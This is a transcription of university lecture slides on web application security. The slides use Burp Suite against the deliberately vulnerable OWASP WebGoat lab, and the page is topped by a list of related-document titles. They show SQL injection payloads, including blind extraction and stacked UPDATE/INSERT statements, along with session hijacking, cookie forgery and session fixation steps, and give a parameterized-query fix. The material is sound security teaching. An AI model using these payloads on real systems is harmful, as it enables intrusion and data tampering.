Príprava štúdia matematiky a informatiky na FMFI UK v anglickom jazyku

Similar documents
UNIVERZITA KOMENSKÉHO V BRATISLAVE FAKULTA MATEMATIKY, FYZIKY A INFORMATIKY PRÍPRAVA ŠTÚDIA MATEMATIKY A INFORMATIKY NA FMFI UK V ANGLICKOM JAZYKU

Cyber Security Workshop Ethical Web Hacking

Web application security: Testing for vulnerabilities

Secure Web Development Teaching Modules 1. Threat Assessment

Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers

Príprava štúdia matematiky a informatiky na FMFI UK v anglickom jazyku

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

THE PROXY SERVER 1 1 PURPOSE 3 2 USAGE EXAMPLES 4 3 STARTING THE PROXY SERVER 5 4 READING THE LOG 6

Web attacks and security: SQL injection and cross-site scripting (XSS)

Getting started with OWASP WebGoat 4.0 and SOAPUI.

Lecture 11 Web Application Security (part 1)

Java Web Application Security

Using SAML for Single Sign-On in the SOA Software Platform

(WAPT) Web Application Penetration Testing

Using Foundstone CookieDigger to Analyze Web Session Management

Configuring Single Sign-on for WebVPN

Massey University Wireless Network Client Configuration Mac OS X

Web Security Threat Report: January April Ryan C. Barnett WASC Member Project Lead: Distributed Open Proxy Honeypots

Hypertext for Hyper Techs

Guidelines for Web applications protection with dedicated Web Application Firewall

HTTP Response Splitting

Reference and Troubleshooting: FTP, IIS, and Firewall Information

How-to: HTTP-Proxy and Radius Authentication and Windows IAS Server settings. Securepoint Security System Version 2007nx

Essential IT Security Testing

Check list for web developers

T14 SECURITY TESTING: ARE YOU A DEER IN THE HEADLIGHTS? Ryan English SPI Dynamics Inc BIO PRESENTATION. Thursday, May 18, :30PM

FTP, IIS, and Firewall Reference and Troubleshooting

User-ID Features. PAN-OS New Features Guide Version 6.0. Copyright Palo Alto Networks

LBL Application Availability Infrastructure Unified Secure Reverse Proxy

Internet Technologies Internet Protocols and Services

Attack and Penetration Testing 101

Crowbar: New generation web application brute force attack tool

Web Application Forensics:

Guide for Setting Up Your Multi-Factor Authentication Account and Using Multi-Factor Authentication

How to configure your Windows PC post migrating to Microsoft Office 365

JASPERREPORTS SERVER WEB SERVICES GUIDE

How to Configure Outlook Client for Exchange

QUANTIFY INSTALLATION GUIDE

Ethical Hacking as a Professional Penetration Testing Technique

reference: HTTP: The Definitive Guide by David Gourley and Brian Totty (O Reilly, 2002)

Cyber Security Challenge Australia 2014

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

How to set up Outlook Anywhere on your home system

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

Web Security Testing Cookbook*

Advantage for Windows Copyright 2012 by The Advantage Software Company, Inc. All rights reserved. Client Portal blue Installation Guide v1.

Application Firewall Configuration Examples

ivoyeur: permission to parse

Guide for Setting Up Your Multi-Factor Authentication Account and Using Multi-Factor Authentication. Mobile App Activation

Login through Citrix

Bitrix Site Manager ASP.NET. Installation Guide

Web Application Security

Thick Client Application Security

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

Acunetix Web Vulnerability Scanner. Getting Started. By Acunetix Ltd.

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

SQL Server Setup for Assistant/Pro applications Compliance Information Systems

DEPLOYMENT GUIDE Version 1.1. Deploying the BIG-IP LTM v10 with Citrix Presentation Server 4.5

Configuring Outlook 2010 Anywhere for UNSW Exchange system.

Installing TestNav Mac with Apple Remote Desktop

Hack Yourself First. Troy troyhunt.com

HTTP Protocol. Bartosz Walter

USING MYWEBSQL FIGURE 1: FIRST AUTHENTICATION LAYER (ENTER YOUR REGULAR SIMMONS USERNAME AND PASSWORD)

Active Directory Authentication Integration

Application Security Testing. Generic Test Strategy

Elluminate Live! Access Guide. Page 1 of 7

WordCom, Inc. Secure File Transfer Web Application

Installing The SysAidTM Server Locally

Video Administration Backup and Restore Procedures

The interactive HTTP proxy WebScarab Installation and basic use

Web Application Penetration Testing

A Java proxy for MS SQL Server Reporting Services

IIS, FTP Server and Windows

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

Massey University Wireless Network - Client

Web Manual: September 2014

Kaseya 2. Installation guide. Version 7.0. English

Module 45 (More Web Hacking)

BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS

IBM. Implementing SMTP and POP3 Scenarios with WebSphere Business Integration Connect. Author: Ronan Dalton

Still Aren't Doing. Frank Kim

OWASP OWASP. The OWASP Foundation Selected vulnerabilities in web management consoles of network devices

NT Authentication Configuration Guide

End User Configuration

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

Security Issues in Web Programming. Robert M. Dondero, Ph.D. Princeton University

Secure Global Desktop (SGD)

PART 1 CONFIGURATION 1.1 Installing Dashboard Software Dashboardxxx.exe Administration Rights Prerequisite Wizard

STABLE & SECURE BANK lab writeup. Page 1 of 21

Outlook Profile Setup Guide Exchange 2010 Quick Start and Detailed Instructions

Web Application Vulnerabilities and Avoiding Application Exposure

USG40HE Content Filter Customization

CS640: Introduction to Computer Networks. Applications FTP: The File Transfer Protocol

Zabbix Manual.

Upgrade Guide BES12. Version 12.1

Transcription:

Univerzita Komenského v Bratislave Fakulta matematiky, fyziky a informatiky Príprava štúdia matematiky a informatiky na FMFI UK v anglickom jazyku ITMS: 26140230008 dopytovo orientovaný projekt Moderné vzdelávanie pre vedomostnú spoločnosť/projekt je spolufinancovaný zo zdrojov EÚ R. Ostertág (DCS, Comenius University) Web Application Security (2) 1 / 15

Web Application Security (Part 2) Richard Ostertág Department of Computer Science Comenius University, Bratislava ostertag@dcs.fmph.uniba.sk 2013/14 R. Ostertág (DCS, Comenius University) Web Application Security (2) 2 / 15

Environment setup 1 Download and install the following applications: Burp Suite Free Edition v1.5 Download burpsuite_free_v1.5.jar to C:/Temp direcotry from http://portswigger.net/burp/burpsuite_free_v1.5.jar Run the suite by doubleclicking on.jar file or execute java -jar burpsuite_free_v1.5.jar We obtain the proxy running on localhost:8080 Alternative is OWASP WebScarab Project OWASP WebGoat v5.4 Download WebGoat-5.4-OWASP_Standard_Win32.zip from https://webgoat.googlecode.com/files/webgoat-5.4-owasp_ Standard_Win32.zip Extract.zip archive into C:/Temp directory Run webgoat.bat Visit http://localhost/webgoat/attack Login with user name guest and password guest R. Ostertág (DCS, Comenius University) Web Application Security (2) 3 / 15

Environment setup 2 Setup a proxy server for browsers: Check the option Internet Options Connections LAN settings Use proxy server Uncheck the option Bypass proxy server for local addresses In the following fields enter: Address: localhost Port: 8080 In advanced settings verify that exceptions field is empty Remarks: It seems that IE 9-11 ignores Bypass proxy for local addresses If port 80 is already used by another server, then it is possible to run WebGoat on another port (./tomcat/conf/server.xml). R. Ostertág (DCS, Comenius University) Web Application Security (2) 4 / 15

HTTP basics (GET request, response) GET request GET /webgoat/attack HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11... Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: sk-sk,sk;q=0.8,cs;q=0.6,en-us;q=0.4,en;q=0.2 Accept-Charset: windows-1250,utf-8;q=0.7,*;q=0.3 Response HTTP/1.1 401 Unauthorized Server: Apache-Coyote/1.1 WWW-Authenticate: Basic realm="webgoat Application" Content-Type: text/html;charset=utf-8 Content-Length: 954 <html>...</html> Upon receipt of this response the browser displays a dialog box for entering username and password. R. Ostertág (DCS, Comenius University) Web Application Security (2) 5 / 15

HTTP basics (basic authentication) After you enter the password the following response is generated: GET /webgoat/attack HTTP/1.1 Host: localhost Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11... Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: sk-sk,sk;q=0.8,cs;q=0.6,en-us;q=0.4,en;q=0.2 Accept-Charset: windows-1250,utf-8;q=0.7,*;q=0.3 Decoding username and password: proxy intercept raw select underlined context menu send to decoder decode as base64 We get: guest:guest R. Ostertág (DCS, Comenius University) Web Application Security (2) 6 / 15

HTTP basics (response with cookie, POST request) HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=46E4ABDC752B45CB489CBB5CBE764654; Path=/webgoat Content-Type: text/html;charset=iso-8859-1 Content-Length: 3774 <html>... <form method="post" name="form" action="attack?screen=264&menu=100"> Enter your Name: <input name="person" type="text" value=""> <input name="submit" type="submit" value="go!"> </form>...</html> POST /webgoat/attack?screen=264&menu=100 HTTP/1.1 Host: localhost Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= Referer: http://localhost:8888/webgoat/attack?screen=264&menu=100 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cookie: JSESSIONID=46E4ABDC752B45CB489CBB5CBE764654 Content-Type: application/x-www-form-urlencoded Content-Length: 25 person=katka&submit=go%21 R. Ostertág (DCS, Comenius University) Web Application Security (2) 7 / 15

Injection Flaws: String SQL Injection "SELECT * FROM employee WHERE userid = " + userid + " and password = " + password + " " Password: OR 1 = 1 remove the limit on the maximum length of the input field "SELECT * FROM employee WHERE userid = " + userid + " and password = OR 1 = 1 " Mitigation: parametrized SQL queries String query = "SELECT * FROM employee WHERE userid =? and password =?"; PreparedStatement statement = connection.preparestatement(query,...); statement.setstring(1, userid); statement.setstring(2, password); ResultSet answer_results = statement.executequery(); R. Ostertág (DCS, Comenius University) Web Application Security (2) 8 / 15

Injection Flaws: Numeric SQL Injection Log in as a user Larry Stooge with password larry Intercept ViewProfile for Larry Stooge POST /webgoat/attack?screen=61&menu=1200 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=64D654CDF1384E9F54F175928746838E employee_id=101&action=viewprofile URL encode: 101 or 1=1 order by salary desc replace the underlined with encoded string send R. Ostertág (DCS, Comenius University) Web Application Security (2) 9 / 15

Injection Flaws: Blind Numeric SQL Injection 101 AND ((SELECT pin FROM pins WHERE cc_number= 1111222233334444 ) > 1000) 101 AND ((SELECT pin FROM pins WHERE cc_number= 1111222233334444 ) = 1000) intercept context menu send to intruder clear all payload markers select 1000, add payloads numbers from 2360 min digits 4, to 2370 max digits 4, step 1, min/max fraction 0 options grep match Account number is valid. intruder start attack Password is 2364 R. Ostertág (DCS, Comenius University) Web Application Security (2) 10 / 15

Injection Flaws: Blind String SQL Injection "SELECT * FROM user_data WHERE userid = " + accountnumber 101 AND (SUBSTRING( (SELECT name FROM pins WHERE cc_number= 4321432143214321 ), 1, 1) = J ) 2, 1) = i ) 3, 1) = l ) 4, 1) = l ) R. Ostertág (DCS, Comenius University) Web Application Security (2) 11 / 15

Injection Flaws: Modify and Add Data with SQL Injection Modify Data with SQL Injection use ; to separate commands ; UPDATE salaries SET salary=9999999 WHERE userid= jsmith Add Data with SQL Injection use ; to separate commands ; INSERT INTO salaries VALUES ( cwillis, 999999); -- R. Ostertág (DCS, Comenius University) Web Application Security (2) 12 / 15

Session Management Flaws: Hijack a Session The server skips authentication if the right WEAKID cookie is send But this cookie is easy to predict: The first part of the cookie is a sequential number The second part is milliseconds Intercept request to Hijack a Session Send request to Sequencer Remove WEAKID=... Every 29th request, an item in sequence is skipped Use Intruder to find matching milliseconds part Use this WEAKID to login R. Ostertág (DCS, Comenius University) Web Application Security (2) 13 / 15

Session M. Flaws: Spoof an Authentication Cookie Attacker is able to bypass the authentication check In this case the attacker can calculate valid authentication cookie For user webgoat: AuthCookie=65432ubphcfx For user aspect: AuthCookie=65432udfqtb Which authentication cookie will be used for user alice? Cookie is formed by concatenating the texttt 65432 text with reversing user name and shifting each letter to the next letter in the alphabet. Login as user webgoat, with password webgoat Intercept request Change AuthCookie=65432ubphcfx to 65432fdjmb The answer comes as if he were already logged on user alice R. Ostertág (DCS, Comenius University) Web Application Security (2) 14 / 15

Session Management Flaws: Session Fixation After authentication there is no change in session ID So the attacker can force user to use the selected session ID 1. step: Add &SID=FixThis to the end of the link in an e-mail message Windows FIX: also replace WebGoat to webgoat in the URL 2. step: Click on Goat Hills Financial, SID is fixed (see URL) 3. step: Login as Jane with pasword tarzan 4. step: After login the attacker sees that his SID=NOVALIDSESSION 5. step: The attacker change his SID from NOVALIDSESSION to FixThis 6. step: After submitting the URL the attacker sees infromation as he is Jane R. Ostertág (DCS, Comenius University) Web Application Security (2) 15 / 15

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information